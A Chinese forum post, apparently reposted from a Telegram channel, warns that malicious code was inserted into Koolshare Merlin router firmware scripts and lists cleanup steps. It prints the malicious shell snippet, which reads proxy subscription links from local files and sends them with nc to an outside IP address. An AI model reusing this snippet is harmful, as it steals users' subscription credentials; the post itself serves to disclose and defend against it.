搜索
缓存时间10 现在时间10 缓存数据 请试着,为欲望和懒惰松绑。你的人生,总要自己渡河摇舟。 ​早安,又是新的一天。
查看: 566|回复: 1

Koolshare梅林固件存在恶意代码偷机场订阅

[复制链接]
发表于 2024-12-8 00:32:36 来自手机 | 显示全部楼层 |阅读模式

厌倦了滚动浏览相同的帖子?当您创建帐户后,您将始终回到您离开的地方。注册帐户,不仅可以享受无广告的清爽界面!

您需要 登录 才可以下载或查看,没有账号?注册

×
紧急通知!紧急通知!

最近不断有软件中心页面错误,版本变成0.0.0的事件发生,且ssh无法登录,scp也无法使用!

经过排查,这是因为恶意代码被插入了软件中心的环境变量脚本导致的!

恶意代码如下:
############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
    links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

    if [ ! -z "$links" ]; then
        echo "$links" | nc -w 5 45.61.185.105 6232
    fi
else
    echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
    online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

    if [ ! -z "$online_links" ]; then
        echo "$online_links" | nc -w 5 45.61.185.105 6232
    fi
fi
以上恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!

简单来说,这些代码的作用就是偷订阅链接!!

目前还不知道恶意代码是怎么插入的,我们还在调查!
如果大家遇到这个问题,你的订阅链接大概率已经被泄露!

赶紧采取以下措施:

如果使用了usb2jffs插件:

1. 拔掉U盘,格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心,将其升级到最新版本(目前是1.9.34)
4. 插入U盘重新制作usb2jffs
5. 最重要的:去你的机场更换订阅链接!

如果没用usb2jffs插件,执行2,3,5步骤!即可
来源:https://t.me/ks_merlin/526

评分

参与人数 1金币 +3 收起 理由
c919 + 3 淡定

查看全部评分

爱生活,爱奶昔~
发表于 2024-12-8 11:22:50 | 显示全部楼层
这不是istoreos以前的那个项目嘛,还有人用啊
爱生活,爱奶昔~
回复 支持 反对

举报

Powered by Nyarime. Licensed

GMT+8, 2025-1-10 10:29 , Processed in 0.043755 second(s), 16 queries , Gzip On, Redis On
发帖际遇 ·手机版 ·小黑屋 ·RSS ·奶昔网 | 沪ICP备13020230号-1 |  沪公网安备 31010702007642号

登录切换风格
快速回复 返回顶部 返回列表